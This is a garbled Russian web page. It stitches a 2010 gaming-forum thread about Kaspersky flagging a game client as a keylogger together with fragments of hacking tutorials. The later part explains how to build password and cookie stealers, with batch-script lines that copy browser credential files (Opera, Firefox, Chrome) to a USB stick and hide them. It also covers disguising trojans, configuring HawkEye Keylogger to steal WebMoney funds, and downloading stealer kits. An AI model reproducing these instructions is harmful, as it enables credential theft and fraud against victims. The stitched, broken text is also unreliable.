Флешка ворующая пароли

Флеш-карты могут красть пароли Windows

Perfect World > Perfect World > Perfect World — Общение с Администрацией > [PW] Вопросы к администрации > Подозрение Касперского на прогу-шпион


PDA

Просмотр полной версии : Подозрение Касперского на прогу-шпион


newfaceoff

07.06.2010, 00:07

Сразу извините если пишу не в той теме!!!

Установил Каспера2010, выдает подозрение на файл ELEMENTCLIENT.EXE
и предупреждение: ЛЕГАЛЬНАЯ ПРОГРАММА, КОТОРАЯ МОЖЕТ БЫТЬ ИСПОЛЬЗОВАНА ЗЛОУМЫШЛЕННИКОМ ДЛЯ НАНЕСЕНИЯ ВРЕДА КОМПЬЮТЕРУ ИЛИ ДАННЫМ ПОЛЬЗОВАТЕЛЯ PDM.KEYLOGGER

ПРОШУ разъяснить данную ситуацию и не связанно ли это с взломом аккаунтов???


касперский дятел просто. Он во всем видит бацилы.


Denobula2

07.06.2010, 02:42

Соглашусь.Ругается на все что можно..
После того как этот дятел профукал червячков и удалил чистые файлы я ему сказал прощай и послал подальше.


Соглашаясь пользовательским соглашением (http://www.pwonline.ru/docs/terms_conditions.html) Вы дали согласие на сбор данных о своем компьютере(пункт 3.5), на что каспер и реагирует…
Вы хотя бы читали его?


Наверняка нет)))я ваще каспера ненавижу….


Assasiny

07.06.2010, 16:48

Описание угрозы хотя б прочитали. Кейлоггер считает как клавиатурный перехватчик, а перехватывают многие игры. Если уверены, что не левый файл, лдобавь в исключения и все дела. Но PDM,Keylogger — может быть что-то другое. Проверь файл на virustotal.com


Makiawelli

07.06.2010, 21:27

касперский параноик, и сильно грузит систему. возможно что elementclent.exe не оригинальный, а скачан топикпастером с какого нибудь сайта, которые обещают что установив этот файлик вы получите: зум, мультиокна, всевозможные хаки, и прочие читерские блага. И вшит туда баналный кейлоггер. Тогда нужно менять пароли в срочном порядке, и восстановить оригинальный файл. Или появятся новые крики о помощи, взломали, ограбили.


Green_King

07.06.2010, 22:05

Сразу извините если пишу не в той теме!!!

Установил Каспера2010, выдает подозрение на файл ELEMENTCLIENT.EXE
и предупреждение: ЛЕГАЛЬНАЯ ПРОГРАММА, КОТОРАЯ МОЖЕТ БЫТЬ ИСПОЛЬЗОВАНА ЗЛОУМЫШЛЕННИКОМ ДЛЯ НАНЕСЕНИЯ ВРЕДА КОМПЬЮТЕРУ ИЛИ ДАННЫМ ПОЛЬЗОВАТЕЛЯ PDM.KEYLOGGER

ПРОШУ разъяснить данную ситуацию и не связанно ли это с взломом аккаунтов???

Нет, не связана) Просто в elementclient ты вводишь данные, а Касперский видит, что нужно вводить какой-то пароль в программу, и думает что это похитител паролей)))


newfaceoff

13.06.2010, 00:49

Нет, не связана) Просто в elementclient ты вводишь данные, а Касперский видит, что нужно вводить какой-то пароль в программу, и думает что это похитител паролей)))
Как раз когда я ввожу пароль ничего не происходит, предупреждение выскакивает когда я нахожусь уже непосредственно в игре, выскакивает не часто но все же….


newfaceoff, Проверьте папку антивирусом, а после просто добавьте elementclient.exe и patcher.exe в исключения (можно и всю папку с клиентом).

Данный случай, на мой взгляд, подтверждает две вещи:
1. Касперский действительно очень качественный антивирус, реагирующий на то, что другие пропускают. Иногда параноидальный, но это не делает его хуже.
(а реагирует он на работу системы безопасности движка Angelica)
2. "Шила в мешке — не утаишь" старая русская пословица 🙂


MeaninglessEnd

18.06.2010, 11:14

Добавь Pw, в группу доверенные у антивируса и будет тебе счастье..


Касперский да, быстро это дело перехватил.

Если включенна локалка он еще будет разок ругаться, наверное подозревает перехват через эту виртуальную клавиатуру. Я сейчас в игру без включенной локалки вхожу, ну их, еще пароль какой нить умный хакер считает.


ребят..вообщето ПВ давно уже обращается к памяти системы напрямую,на что должны реагировать добротные мсэ-антивирусы-протекторы систем.
По сути можно конечно добавить в список исключений но ) элементклиент собирает список запущеных системой процессов.В англонете выдвигались разные версии для чего это делается..толь для отлова китаский ботов..толь для проверки мультиокон.К единому итогу не пришли но факт подтвердили.
Дружащие с английским-немецким могут попытать гугл.Больше сказать ничего не могу ибо правила форума)


быдло бот,снова ты?


Добавь Pw, в группу доверенные у антивируса и будет тебе счастье..

точняк )) пусть в этой папке вирусы плодятся спокойно, не беспокоя вас )))) до поры

Каспера у меня нет. Он меня напригает сильнее вирусов ))) , но всёравно мелкий совет. Включите брандмауэр Windows (лудше без исключений), любой антивир реже орать будет.


Arangald

05.08.2010, 02:29

У меня подобная шняга с каспером… сворачиваю клиент и выдаёт, что поведение, напоминающее кейлоггер… даже добавление в доверенные не помогает…
а ещё если клиент свернуть, то вылетает он…
—редакт—
пв скачан с оф сайта и никаких вирусов и всяческих шпионских читов нету на компе…


IFrost_U

06.08.2010, 08:41

У меня подобная шняга с каспером… сворачиваю клиент и выдаёт, что поведение, напоминающее кейлоггер… даже добавление в доверенные не помогает…
а ещё если клиент свернуть, то вылетает он…
—редакт—
пв скачан с оф сайта и никаких вирусов и всяческих шпионских читов нету на компе…

тож было такое =)


Сразу извините если пишу не в той теме!!!

Установил Каспера2010, выдает подозрение на файл ELEMENTCLIENT.EXE
и предупреждение: ЛЕГАЛЬНАЯ ПРОГРАММА, КОТОРАЯ МОЖЕТ БЫТЬ ИСПОЛЬЗОВАНА ЗЛОУМЫШЛЕННИКОМ ДЛЯ НАНЕСЕНИЯ ВРЕДА КОМПЬЮТЕРУ ИЛИ ДАННЫМ ПОЛЬЗОВАТЕЛЯ PDM.KEYLOGGER

ПРОШУ разъяснить данную ситуацию и не связанно ли это с взломом аккаунтов???

Юзай антивирь Avast Уже года 1.5-2 у меня стоит. На ПВ не жалуется. Да и сканирует абсолютно все сайты на которые я захожу.


avatarkondrasho

15.08.2010, 23:22

Наверняка нет)))я ваще каспера ненавижу….

я тож,пользуюсь авастом)вроде нормально


*пожимая плечами* если аваст идиотничает-беда лишь тех,кто его поставил.Писалось уже выше про недокументированные фичи легальной игры ПВ,которые она использует негласно…


LEBSANDR

16.08.2010, 01:38

я не пользуюсь касперским


LEBSANDR
я не пользуюсь виндой…и что?Краткость-дивная сестра таланта..однако не в вашем посте


У меня два ответа на этот вопрос… Хороший и плохой…
1) Да касперский Гад!!! — спецом видит клавиатурный шпион и хочет сорвать бабла со снятия исполняемых файлов из своей базы данных!!!
2)игре уже второй год… и за все это время все версии касперского видят в исполняемых файлах клавиатурный шпион, что наводит на мысль — почему сами разработчики не пасутся за ПО (ведь многих обладателей KIS) может остановить установка програмного обеспечения с угрозой от каспера!!! И второе почему каспер до сих пор сам не убрал программу в исключения???

И тут как говориться палка о двух концах — Либо тупо хотят денег (и те и другие) — ли бо прога действительно не безопасна….

ЗЫ на заметку Кейлогеры — способны пеленговать все операции совершаемые на компьютере — то есть все кнопки нажатые вами с момента запуска программы Куда то улетают…… не китайцам ли?=)


ЗЫ на заметку Кейлогеры — способны пеленговать все операции совершаемые на компьютере — то есть все кнопки нажатые вами с момента запуска программы Куда то улетают…… не китайцам ли?=)
Ога, именно им.
Не говорите глупостей.

ИМХО, сносите каспер и ставьте что-нибудь по-лучше… Тот же аваст например


LordRandom

24.10.2010, 20:09

ИМХО, сносите каспер и ставьте что-нибудь по-лучше… Тот же аваст например

Avast ничем не лучше Каспера,так же как и Nod.Просто в отличие от этих антивирусов у Каспера на многое нужно не обращать внимания.


Krivorukii

24.10.2010, 20:19

ИМХО, сносите каспер и ставьте что-нибудь по-лучше… Тот же аваст например

Avast ничем не лучше Каспера,так же как и Nod.Просто в отличие от этих антивирусов у Каспера на многое нужно не обращать внимания.

Ещё на форуме PW не хватало холиваров по поводу антивирусов 🙁
У мя когда стоял Касперский, также ругался на многие игры (на PW в том же числе). Нужно их просто добавить в список доверенных программ. Никаких кейлогеров в клиенте нету


LordValok

24.10.2010, 20:22

Оффни Касперского!
Я всегда перед игрой оффаю,что-бы из данжа не вылететь)


Powered by vBulletin® Version 4.1.5 Copyright © 2018 vBulletin Solutions, Inc. All rights reserved. Перевод: zCarot

Защита файлов от кражи с компьютера.

Если на вашем компьютере хранятся личные файлы, и вы бы не хотели, чтобы их кто-то скопировал на внешние устройства с вашего ПК и использовал в своих целях. То файлы можно надёжно защитить от записи на флеш карты и прочие внешние устройства используя возможности BitLocker! После того, как будет включена защита файлов от копирования, любое устройство, которое будет подключено, к вашему компьютеру будет доступно только для чтения. Копирование файлов будет невозможна, таким образом украсть файлы с вашего компьютера будет невозможно для обычных пользователей.

Более опытный пользователь может предположить, что запрет на запись файлов был активирован именно с помощью BitLocker, и тогда кражи файлов не избежать. Откройте «Редактор групповой политики» для этого в командной строке выполните команду «gpedit» или в место «cmd» вы можете также использовать диалоговое окно «Выполнить» которое можно открыть сочетанием клавиш «Win + R».

Флешка для кражи паролей

СЕГОДНЯ Я РАССКАЖУ О ТОМ, КАК ХАКЕР БУКВАЛЬНО ЗА НЕСКОЛЬКО СЕКУНД МОЖЕТ УКРАСТЬ ПАРОЛИ WINDOWS И СОЗДАТЬ ДЛЯ СЕБЯ ЧЕРНЫЙ ХОД, ИСПОЛЬЗУЯ УЯЗВИМОСТЬ ОС И СЛАБЫЙ LM-ХЭШ ПАРОЛЯ.

ДЛЯ ЭТОГО ЕМУ ПОНАДОБИТСЯ ФИЗИЧЕСКИЙ ДОСТУП К ЖЕРТВЕ, USB-ФЛЕШКА, НУ И КОНЕЧНО «SOME SCRIPTS AND SOME TOOLS» 🙂 Компания U3 (www.u3.com) совместно с SanDisk и M-System сделала современные usb-носители чем-то большим, нежели просто средством для хранения данных.

Она стандартизирует среду запуска портативных приложений и делает их работу безопасной. Софт на USB имеет возможность запускаться при присоединении флешки и автоматически закрываться при обратном действии.

Естественно не оставляя никаких следов в системе.

Разработчики предоставляют SDK, который позволяет адаптировать программы для платформы U3.

На software.

Флешка для взлома или cookie stealer.

Итак, в этой статье я расскажу, как можно получить пароль и всякую интересную информацию при помощи сайта. Всё что нужно «хацкеру» — это просто иметь в сети свою страничку, на которую вы либо придёте сами, либо вас туда заманят.

Скитаясь по сети, я всё чаще и чаще слышу плохие отзывы о социнжинерии.

Если вас не интересуют способы взлома с применением социнжинерии или для вас это всё детский лепет, то нажмите в верхнем углу вашего браузера крестик и забудьте о существовании этой статьи. В наше время мало только разбираться в системных кодах и всяких программерских штучках, но ещё надо уметь общаться с народом.

Многие хакеры взламывают банки, компьютеры, базы данных не только вычисляя уязвимости в системе безопасности, но и пользуются социнженерией на каждом углу, ведь хакер не только тот, кто взломал систему, но и тот, кто методом общения получает зачастую доступ к самым любопытным местам инета.

В очередном выпуске сайта хакерских видеоподкастов Hak5 продемонстрирована серьезная уязвимость функций автозапуска и управления локальной сетью Windows. Инструмент, представленный в видеопрограмме, назван «USB-инструмент мгновенного восстановления пароля», или «USB Switchblade».

Основная проблема в системе аутентификации Windows — использование слабого хэша пароля LAN Manager (LM), вычисленного по алгоритму DES.

Проблема не в самом криптоалгоритме, а в его реализации.

Пароль переводится в верхний регистр (при использовании букв получаем 26 вариантов вместо 52), затем — пароль дополняется или обрезается до 14 символов, делится пополам, и уже от этих половинок создаются два 8-символьных хэша по алгоритму DES. Эти 16 символов и хранятся в качестве хэша LM. То есть, система заведомо упрощает для взломщика процесс подбора, сначала сужая количество вариантов, а затем разделяя пароль пополам.

Здесь я расскажу как сделать простой троян для кражи паролей от ICQ, Vkontakte, Odnoklassniki, Mail. и т.д и т.п. Приступим. для начало нам нужны некоторый программы . Multi Password Recovery- утилита для восстановления забытых паролей blat- почтовый.

посылаем жертве и через несколько секунд куки придут на ваш майл. [+]Данный троян безпалевный и весит очень мало 6 кб.

[+]Крадет пароли от Opera, icq6 ,icq6.5 и куки от IE. Привет,сегодня мы из Multi Password Recovery сделаем программу (стиллер) для кражи всех паролей с компа Первое что нам нужно это сам MPR. качаем по ссылке Клац установим MPR в отдельную папку.

2017-06-09

WantedPS

Как создать вирусную программу для кражи денег

Оглавление:

Создаем троян для кражи пароля

Затем заходим в «опции билда» и жмём сменить иконку чтоб наш троян был похож на настоящую программу или же жмём склейка файлов ( так лучше у жертывы будет запускаться программа с которой склеили трой и вместе с прогой сам троян ) План работы вируса такой: его запускают, он сканирует все папки на ПК и копирует необходимые файлы (по маске, например, *.txt. pass* и т. д.) на флешку.

ЛИГА ПЛОХИХ ШУТОК #10 | Гарик Харламов х Филипп Киркоров

Включает режим расширенной обработки комманд, т. е. разрешает сложные конструкции типа две комманды в одном условии и другие.

Не смейтесь, ведь для Batch’a это очень даже круто.

Дальше нужно запомнить путь к директории откуда запущен батник (мы же должны копировать данные на нашу же флешку, а не на какой-нибудь жесткий диск) потому что код, который идет дальше сбивает значение переменной CD (текущая рабочая папка).

Как создать вирусную программу для кражи денег

Скачивать программу тут — http://zalil.ru/33922307

Перезалил стилер на последнюю версию.

Регистрация хостинга — http://hut.ru/

Клиент FileZilla — http://filezilla-project.org/

Советую посмотреть еще вот это видео — http://www.youtube.com/watch?v=1lf3JVdu8FA

d0\Google CD/D %APPDATA%\Opera\Opera\ copy /y wand.dat %

d0\Opera\ copy /y cookies.dat %

d0\Opera\ cd %AppData%\Mozilla\Firefox\Profiles\*.default copy /y cookies.sqlite %

d0\Mozilla copy /y signons.sqlite %

d0\Mozilla copy /y AppData%\Mozilla\Firefox\Profiles\*.default %

d0\Mozilla cd %localappdata%\Google\Chrome\User Data\Default copy /y «%localappdata%\Google\Chrome\User Data\Default\Login Data» «%

d0\Google» ATTRIB -R -A -S -H attrib +h %

d0\Google? Исходник самой програмки:https://goo.gl/KM8oq8 НОВЕЙШАЯ ВЕРСИЯ 2017 ГОДА(ПЕРЕЗАЛИТА 21.11.16)

Делаем програму и перебрасиваем нужному человеку при помощи еmail, skype, icq и тд.

Скачать програму можно здесь.

http://yadi.sk/d/eiy-xoL63yMwU Ключ к архиву UFR

Ссылка на файлы для создания флешки стилер: https://cloud.mail.ru/public/u5oU/btPnvZ4G8 Если хотите помочь развитию канала, вот вебмани кошельки: R282661666131 B365244733434 Z687469226683

Связь со мной Вк https://vk.com/id402508853 Цена http://softer-team.ru/?page_id=10

Хотя на сегодняшний день заражение ПК с Windows через новую, неизвестную уязвимость в системе встречается достаточно редко. Счета клиентов системы интернет-банкинга «Сбербанк Онлайн» могут быть взломаны с помощью вредоносной программы, которая уже более суток распространяется через «Google Play», магазин приложений для смартфонов и планшетов на системе Android. Вопреки скептическому отношению большинства граждан к существующей системе правоохранения, мошенников все же ловят.

Куда обращаться При незаконном снятии денег с вашего счёта немедленно звоните в банк, предоставляющий вам услуги, и блокируйте карту.

Как создать вирус который ворует деньги с Webmoney

Компьютеры Первым делом вам нужно определиться, через какую программу вы будете делать вирус.

Я делал через программу HawkEyeKeylogger почему делал, ответ будет в конце статьи.

Итак, скачиваем эту программу на каком-нибудь сайте.

Переходим на наш сайт http: Теперь вы должны взять на заметку эти строки http: Переходим на ваш сайт, он находится в зелёной рамочке на скриншоте.

И у вас должен быть такой дизайн http: Возвращаемся в нашу программу.

И заполняем как на скриншоте http: Ваш пароль, который вы указывали при создании сайта, не аккаунта.

Переходим в Option 1 и ставим всё как на скриншоте http: Какие пароли сворует программа.

Запуск от имени администратора.

Удаление программы после запуска. Option 2 и Option 3 пропускаем.

Переходим в Option 4. В этом разделе можно выбрать иконку вашего вируса.

Скачайте для себя любую иконку с расширением. И переходи в Build.

Статья Уголовного Кодекса часть 1 нарушение тайны переписки и часть 1 статьи Уголовного Кодекса неправомерный доступ к компьютерной информации.

Добавить комментарий

Закрыть меню